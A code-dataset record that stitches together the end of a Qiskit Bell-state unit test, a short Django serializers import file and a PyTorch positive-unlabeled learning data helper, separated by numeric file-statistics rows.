# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |10⟩, by applying the Pauli-X Gate on the 2nd Qubit;
# 3) Prepare of the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
# 4) Measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩),
# by inverting the Quantum Circuit of Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
def test_prepare_and_measure_bell_state_psi_minus_10(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiminus", num_qubits)
qiskit_classical_register_bell_state_psi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiminus",
qiskit_quantum_register_bell_state_psi_minus,
qiskit_classical_register_bell_state_psi_minus,
global_phase=0)
# Prepare the Quantum State |10⟩, by applying the Pauli-X Gate on the 2nd Qubit
qiskit_quantum_circuit_2_qubits.apply_pauli_x(1)
# Prepare the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus_prepared = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus_measured = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_bell_state_psi_minus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_minus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_minus_array_10 = array([(0. + 0.j),
(0. + 0.j),
(1. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_bell_state_psi_minus_array_10, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #4 for prepare and measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |11⟩,
# by applying the Pauli-X Gate on both of the 1st and 2nd Qubits;
# 3) Prepare of the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
# 4) Measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩),
# by inverting the Quantum Circuit of Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
def test_prepare_and_measure_bell_state_psi_minus_11(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiminus", num_qubits)
qiskit_classical_register_bell_state_psi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiminus",
qiskit_quantum_register_bell_state_psi_minus,
qiskit_classical_register_bell_state_psi_minus,
global_phase=0)
# Prepare the Quantum State |11⟩, by applying the Pauli-X Gate on both of the 1st and 2nd Qubits
qiskit_quantum_circuit_2_qubits.apply_pauli_x(0)
qiskit_quantum_circuit_2_qubits.apply_pauli_x(1)
# Prepare the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus_prepared = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus_measured = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_bell_state_psi_minus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_minus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_minus_array_11 = array([(0. + 0.j),
(0. + 0.j),
(0. + 0.j),
(1. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_bell_state_psi_minus_array_11, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
if __name__ == '__main__':
# Test Cases for prepare the Bell States
bell_states_prepare_tests_suite = unittest.TestLoader().loadTestsFromTestCase(PrepareBellStateTests)
# Test Cases for prepare and measure the Bell State
epr_pair_bell_states_phi_plus_prepare_and_measure_tests_suite = \
unittest.TestLoader().loadTestsFromTestCase(PrepareAndMeasureEPRPairBellStatePhiPlusTests)
bell_states_phi_minus_prepare_and_measure_tests_suite = \
unittest.TestLoader().loadTestsFromTestCase(PrepareAndMeasureBellStatePhiMinusTests)
bell_states_psi_plus_prepare_and_measure_tests_suite = \
unittest.TestLoader().loadTestsFromTestCase(PrepareAndMeasureBellStatePsiPlusTests)
bell_states_psi_minus_prepare_and_measure_tests_suite = \
unittest.TestLoader().loadTestsFromTestCase(PrepareAndMeasureBellStatePsiMinusTests)
# Create a Global for all the Test Cases established
all_test_cases = unittest.TestSuite([bell_states_prepare_tests_suite,
epr_pair_bell_states_phi_plus_prepare_and_measure_tests_suite,
bell_states_phi_minus_prepare_and_measure_tests_suite,
bell_states_psi_plus_prepare_and_measure_tests_suite,
bell_states_psi_minus_prepare_and_measure_tests_suite])
| 56.31746 | 111 | 0.61843 | 9,241 | 74,508 | 4.753382 | 0.020777 | 0.088717 | 0.038793 | 0.017051 | 0.970632 | 0.966944 | 0.964372 | 0.962915 | 0.962915 | 0.953262 | 0 | 0.027805 | 0.307806 | 74,508 | 1,322 | 112 | 56.360061 | 0.816826 | 0.351533 | 0 | 0.843168 | 0 | 0 | 0.063121 | 0.014036 | 0 | 0 | 0 | 0 | 0.063665 | 1 | 0.031056 | false | 0 | 0.012422 | 0 | 0.051242 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a38aa9175361ed9a3f347cc8545d754c83f7fdec | 257 | py | Python | apps/api/serializers/__init__.py | luisito666/Mt2Web.py | e37ca79a5a21373c8b773cf30c622beba6d28ec4 | [
"MIT"
] | 5 | 2018-02-04T05:41:39.000Z | 2021-11-09T10:51:58.000Z | apps/api/serializers/__init__.py | vps-hosting/Mt2Web.py | e37ca79a5a21373c8b773cf30c622beba6d28ec4 | [
"MIT"
] | 4 | 2020-11-22T16:07:47.000Z | 2022-01-13T03:27:05.000Z | apps/api/serializers/__init__.py | vps-hosting/Mt2Web.py | e37ca79a5a21373c8b773cf30c622beba6d28ec4 | [
"MIT"
] | 4 | 2018-12-22T23:56:47.000Z | 2021-07-31T11:00:54.000Z | from .signup_serializer import RegisterSerializer, SigupSerializer
from .ranking_serializer import RankingPlayerSerializer, RankingGuildSerializer
from .token_serializer import (
PasswordField,
TokenObtainBaseSerializer,
TokenObtainSerializer,
) | 36.714286 | 79 | 0.848249 | 19 | 257 | 11.315789 | 0.684211 | 0.223256 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.11284 | 257 | 7 | 80 | 36.714286 | 0.942982 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.142857 | 0.428571 | 0 | 0.428571 | 0 | 1 | 0 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 7 |
6e669caee9d6c4091d9bc9536ac51a64d2c1c39d | 28,509 | py | Python | helper.py | acmi-lab/PU_learning | a9174bda92c7411906056c789011cfa41749ee5f | [
"Apache-2.0"
] | 18 | 2021-11-04T02:26:47.000Z | 2022-03-15T04:41:18.000Z | helper.py | acmi-lab/PU_learning | a9174bda92c7411906056c789011cfa41749ee5f | [
"Apache-2.0"
] | null | null | null | helper.py | acmi-lab/PU_learning | a9174bda92c7411906056c789011cfa41749ee5f | [
"Apache-2.0"
] | 1 | 2022-01-14T03:22:37.000Z | 2022-01-14T03:22:37.000Z | import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
from torch.utils import data
import torchvision
import torchvision.transforms as transforms
import numpy as np
from PIL import Image
from data_helper import *
from model_helper import *
class PosData(torch.utils.data.Dataset):
def __init__(self, transform=None, target_transform=None, data=None, \
index=None, data_type=None):
self.transform = transform
self.target_transform = target_transform
self.data=data
self.targets = np.zeros(data.shape[0], dtype= np.int_)
self.data_type = data_type
self.index = index
def __len__(self):
return len(self.targets)
def __getitem__(self, idx):
index, img, target = self.index[idx], self.data[idx], self.targets[idx]
if self.data_type == 'cifar' :
img = Image.fromarray(img)
elif self.data_type =='mnist':
img = Image.fromarray(img, mode='L')
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return index, img, target
class UnlabelData(torch.utils.data.Dataset):
def __init__(self, transform=None, target_transform=None, pos_data=None, \
neg_data=None, index=None, data_type=None):
self.transform = transform
self.target_transform = target_transform
self.data=np.concatenate((pos_data, neg_data), axis=0)
self.true_targets = np.concatenate((np.zeros(pos_data.shape[0], dtype= np.int_), np.ones(neg_data.shape[0], dtype= np.int_)), axis=0)
self.targets = np.ones_like(self.true_targets, dtype= np.int_)
self.data_type = data_type
self.index = index
def __len__(self):
return len(self.targets)
def __getitem__(self, idx):
index, img, target, true_target = self.index[idx], self.data[idx], self.targets[idx], self.true_targets[idx]
if self.data_type == 'cifar' :
img = Image.fromarray(img)
elif self.data_type =='mnist':
img = Image.fromarray(img, mode='L')
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return index, img, target, true_target
def get_PUDataSplits(data_obj, pos_size, alpha, beta, data_type=None):
unlabel_size = int((1-beta)*pos_size/beta)
assert ((pos_size + int(unlabel_size*alpha)) < len(data_obj.p_data)), "Check sizes again"
assert ((int(unlabel_size*(1-alpha))) < len(data_obj.n_data)), "Check sizes again"
pos_data = data_obj.p_data[:pos_size]
unlabel_pos_data = data_obj.p_data[pos_size: pos_size+ int(unlabel_size*alpha)]
unlabel_neg_data = data_obj.n_data[:int(unlabel_size*(1-alpha))]
return PosData(transform=data_obj.transform, \
target_transform=data_obj.target_transform, \
data=pos_data, index=np.array(range(pos_size)), data_type=data_type), \
UnlabelData(transform=data_obj.transform, \
target_transform=data_obj.target_transform, \
pos_data=unlabel_pos_data, neg_data=unlabel_neg_data, \
index=np.array(range(unlabel_size)),data_type=data_type)
def get_PNDataSplits(data_obj, pos_size, neg_size, data_type=None):
unlabel_pos_data = data_obj.p_data[:pos_size]
unlabel_neg_data = data_obj.n_data[:neg_size]
return UnlabelData(transform=data_obj.transform, \
target_transform=data_obj.target_transform, \
pos_data=unlabel_pos_data, neg_data=unlabel_neg_data, \
index=np.array(range(pos_size + neg_size)),data_type=data_type)
def get_dataset(data_dir, data_type,net_type, device, alpha, beta, batch_size):
p_trainloader=None
u_trainloader=None
p_validloader=None
u_validloader=None
net=None
X=None
Y=None
if data_type=='gaussian':
'''
Gaussian Data hyperparamters and data
'''
num_points = 6000
input_size =200
pos_size = 2000
gauss_traindata = Gaussain_data(mu=1.0, sigma=np.sqrt(input_size//2), size=num_points, dim=input_size//2)
gauss_testdata = Gaussain_data(mu=1.0, sigma=np.sqrt(input_size//2), size=num_points, dim=input_size//2)
p_traindata, u_traindata = get_PUDataSplits(gauss_traindata, pos_size=pos_size, alpha=alpha, beta=beta)
p_validdata , u_validdata = get_PUDataSplits(gauss_testdata, pos_size=pos_size, alpha=alpha, beta=beta)
X = p_traindata.data
Y = u_traindata.data
p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = input_size)
net = net.to(device)
elif data_type=='toy_continuous':
'''
Toy dataset from P vs U failure for domain discrimination
'''
toy_traindata = ToyDataContinuous()
toy_testdata = ToyDataContinuous()
pos_size = 50
p_traindata, u_traindata = get_PUDataSplits(toy_traindata, pos_size=pos_size, alpha=alpha, beta=beta)
p_validdata, u_validdata = get_PUDataSplits(toy_testdata, pos_size=pos_size, alpha=alpha, beta=beta)
X = p_traindata.data
Y = u_traindata.data
p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=pos_size, \
shuffle=True, num_workers=2)
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=pos_size, \
shuffle=True, num_workers=2)
p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=pos_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=pos_size, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = 2)
net = net.to(device)
elif data_type=='toy_discrete':
toy_traindata = ToyData()
toy_testdata = ToyData()
pos_size = 8
p_traindata, u_traindata = get_PUDataSplits(toy_traindata, pos_size=pos_size, alpha=alpha, beta=beta)
p_validdata, u_validdata = get_PUDataSplits(toy_testdata, pos_size=pos_size, alpha=alpha, beta=beta)
X = p_traindata.data
Y = u_traindata.data
p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=pos_size, \
shuffle=True, num_workers=2)
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=pos_size, \
shuffle=True, num_workers=2)
p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=pos_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=pos_size, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = 2)
net = net.to(device)
elif data_type=='mnist_17':
transform_train = transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.1307,), (0.3081,))
])
transform_test = transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.1307,), (0.3081,))
])
traindata = MNIST17Data(root=data_dir, train=True, transform=transform_train)
testdata = MNIST17Data(root=data_dir, train=False, transform=transform_test)
p_traindata, u_traindata = get_PUDataSplits(traindata, pos_size=3000, alpha=alpha, beta=beta,data_type='mnist')
p_validdata, u_validdata = get_PUDataSplits(testdata, pos_size=500, alpha=alpha, beta=beta,data_type='mnist')
X = p_traindata.data.reshape((p_traindata.data.shape[0], -1))
Y = u_traindata.data.reshape((u_traindata.data.shape[0], -1))
p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = 784)
net = net.to(device)
elif data_type=='mnist_binarized':
transform_train = transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.1307,), (0.3081,))
])
transform_test = transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.1307,), (0.3081,))
])
traindata = BinarizedMNISTData(root=data_dir, train=True, transform=transform_train)
testdata = BinarizedMNISTData(root=data_dir, train=False, transform=transform_test)
p_traindata, u_traindata = get_PUDataSplits(traindata, pos_size=15000, alpha=alpha, beta=beta,data_type='mnist')
p_validdata, u_validdata = get_PUDataSplits(testdata, pos_size=2500, alpha=alpha, beta=beta,data_type='mnist')
X = p_traindata.data.reshape((p_traindata.data.shape[0], -1))
Y = u_traindata.data.reshape((u_traindata.data.shape[0], -1))
p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = 784)
net = net.to(device)
elif data_type=='mnist_overlap':
transform_train = transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.1307,), (0.3081,))
])
transform_test = transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.1307,), (0.3081,))
])
traindata = OverlapMNISTData(root=data_dir, train=True, transform=transform_train)
testdata = OverlapMNISTData(root=data_dir, train=False, transform=transform_test)
p_traindata, u_traindata = get_PUDataSplits(traindata, pos_size=15000, alpha=alpha, beta=beta,data_type='mnist')
p_validdata, u_validdata = get_PUDataSplits(testdata, pos_size=2500, alpha=alpha, beta=beta,data_type='mnist')
X = p_traindata.data.reshape((p_traindata.data.shape[0], -1))
Y = u_traindata.data.reshape((u_traindata.data.shape[0], -1))
p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = 784)
net = net.to(device)
elif data_type=='cifar_DogCat':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
traindata = DogCatData(root=data_dir, train=True, transform=transform_train)
testdata = DogCatData(root=data_dir, train=False, transform=transform_test)
p_traindata, u_traindata = get_PUDataSplits(traindata, pos_size=2500, alpha=alpha, beta=beta,data_type='cifar')
p_validdata, u_validdata = get_PUDataSplits(testdata, pos_size=500, alpha=alpha, beta=beta,data_type='cifar')
X = p_traindata.data.reshape((p_traindata.data.shape[0], -1))
Y = u_traindata.data.reshape((u_traindata.data.shape[0], -1))
p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=int(batch_size*(1-beta)/beta), \
shuffle=True, num_workers=2)
p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=int(batch_size*(1-beta)/beta), \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = 3072)
net = net.to(device)
elif data_type=='cifar_binarized':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
traindata = BinarizedCifarData(root=data_dir, train=True, transform=transform_train)
testdata = BinarizedCifarData(root=data_dir, train=False, transform=transform_test)
p_traindata, u_traindata = get_PUDataSplits(traindata, pos_size=12500, alpha=alpha, beta=beta,data_type='cifar')
p_validdata, u_validdata = get_PUDataSplits(testdata, pos_size=2500, alpha=alpha, beta=beta,data_type='cifar')
X = p_traindata.data.reshape((p_traindata.data.shape[0], -1))
Y = u_traindata.data.reshape((u_traindata.data.shape[0], -1))
p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=int(batch_size*(1-beta)/beta), \
shuffle=True, num_workers=2)
p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=int(batch_size*(1-beta)/beta), \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = 3072)
net = net.to(device)
elif data_type.startswith("UCI"):
uci_data_type = data_type.split("_")[1]
p_data, n_data = uci_data(uci_data_type)
keep_num = min(len(p_data), len(n_data))
p_data = p_data[:keep_num]
n_data = n_data[:keep_num]
train_p_size= keep_num//3
test_p_size= keep_num//6
traindata = UCI_data(p_data=p_data, n_data=n_data, train=True)
testdata = UCI_data(p_data=p_data, n_data=n_data, train=False)
p_traindata, u_traindata = get_PUDataSplits(traindata, pos_size=train_p_size, alpha=alpha, beta=beta,data_type='uci')
p_validdata, u_validdata = get_PUDataSplits(testdata, pos_size=test_p_size, alpha=alpha, beta=beta,data_type='uci')
X = p_traindata.data.reshape((p_traindata.data.shape[0], -1))
Y = u_traindata.data.reshape((u_traindata.data.shape[0], -1))
p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=int(batch_size*(1-beta)/beta), \
shuffle=True, num_workers=2)
p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=int(batch_size*(1-beta)/beta), \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = p_data.shape[-1])
net = net.to(device)
elif data_type=="IMDb_BERT":
train_texts, train_labels = read_imdb_split(f'./{data_dir}/aclImdb/train')
test_texts, test_labels = read_imdb_split(f'./{data_dir}/aclImdb/test')
transform = initialize_bert_transform('distilbert-base-uncased')
train_dataset = IMDbBERTData(train_texts, train_labels, transform=transform)
test_dataset = IMDbBERTData(test_texts, test_labels, transform=transform)
p_traindata, u_traindata = get_PUDataSplits(train_dataset, pos_size=6250, alpha=alpha, beta=beta,data_type='IMDb_BERT')
p_validdata, u_validdata = get_PUDataSplits(test_dataset, pos_size=5000, alpha=alpha, beta=beta,data_type='IMDb_BERT')
X = p_traindata.targets
Y = u_traindata.targets
p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=8, \
shuffle=True)
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=8, \
shuffle=True)
p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=128, \
shuffle=True)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=128, \
shuffle=True)
## Initialize model
net = get_model(net_type)
net = net.to(device)
return p_trainloader, u_trainloader, p_validloader, u_validloader, net, X, Y, p_validdata, u_validdata, u_traindata
def get_PN_dataset(data_dir, data_type,net_type, device, alpha, beta, batch_size):
u_trainloader=None
u_validloader=None
net=None
if data_type=='gaussian':
'''
Gaussian Data hyperparamters and data
'''
num_points = 6000
input_size =200
pos_size = 2000
gauss_traindata = Gaussain_data(mu=1.0, sigma=np.sqrt(input_size//2), size=num_points, dim=input_size//2)
gauss_testdata = Gaussain_data(mu=1.0, sigma=np.sqrt(input_size//2), size=num_points, dim=input_size//2)
u_traindata = get_PNDataSplits(gauss_traindata, unlabeled_size=int(num_points//2))
u_validdata = get_PNDataSplits(gauss_traindata, unlabeled_size=int(num_points//2))
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = input_size)
net = net.to(device)
elif data_type=='toy_continuous':
'''
Toy dataset from P vs U failure for domain discrimination
'''
toy_traindata = ToyDataContinuous()
toy_testdata = ToyDataContinuous()
pos_size = 50
u_traindata = get_PNDataSplits(toy_traindata, unlabeled_size=pos_size*2)
u_validdata = get_PNDataSplits(toy_testdata, unlabeled_size=pos_size*2)
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=pos_size*2, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=pos_size*2, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = 2)
net = net.to(device)
elif data_type=='toy_discrete':
toy_traindata = ToyData()
toy_testdata = ToyData()
pos_size = 8
u_traindata = get_PNDataSplits(toy_traindata, unlabeled_size=pos_size)
u_validdata = get_PNDataSplits(toy_testdata, unlabeled_size=pos_size)
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=pos_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=pos_size, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = 2)
net = net.to(device)
elif data_type=='mnist_17':
transform_train = transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.1307,), (0.3081,))
])
transform_test = transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.1307,), (0.3081,))
])
traindata = MNIST17Data(root=data_dir, train=True, transform=transform_train)
testdata = MNIST17Data(root=data_dir, train=False, transform=transform_test)
u_traindata = get_PNDataSplits(traindata, pos_size=3000, neg_size=int(3000*(1-alpha)*(1-beta)/beta), data_type='mnist')
u_validdata = get_PNDataSplits(testdata,pos_size=int(500*alpha), neg_size=int(500*(1-alpha)),data_type='mnist')
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = 784)
net = net.to(device)
elif data_type=='mnist_binarized':
transform_train = transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.1307,), (0.3081,))
])
transform_test = transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.1307,), (0.3081,))
])
traindata = BinarizedMNISTData(root=data_dir, train=True, transform=transform_train)
testdata = BinarizedMNISTData(root=data_dir, train=False, transform=transform_test)
u_traindata = get_PNDataSplits(traindata, pos_size=15000, neg_size=int(15000*(1-alpha)*(1-beta)/beta), data_type='mnist')
u_validdata = get_PNDataSplits(testdata, pos_size=int(2500*alpha), neg_size=int(2500*(1 - alpha)), data_type='mnist')
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = 784)
net = net.to(device)
elif data_type=='cifar_DogCat':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
traindata = DogCatData(root=data_dir, train=True, transform=transform_train)
testdata = DogCatData(root=data_dir, train=False, transform=transform_test)
u_traindata = get_PNDataSplits(traindata, pos_size=2500, neg_size=int(2500*(1-alpha)*(1-beta)/beta), data_type='cifar')
u_validdata = get_PNDataSplits(testdata, pos_size=int(500*alpha), neg_size=int(500*alpha), data_type='cifar')
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
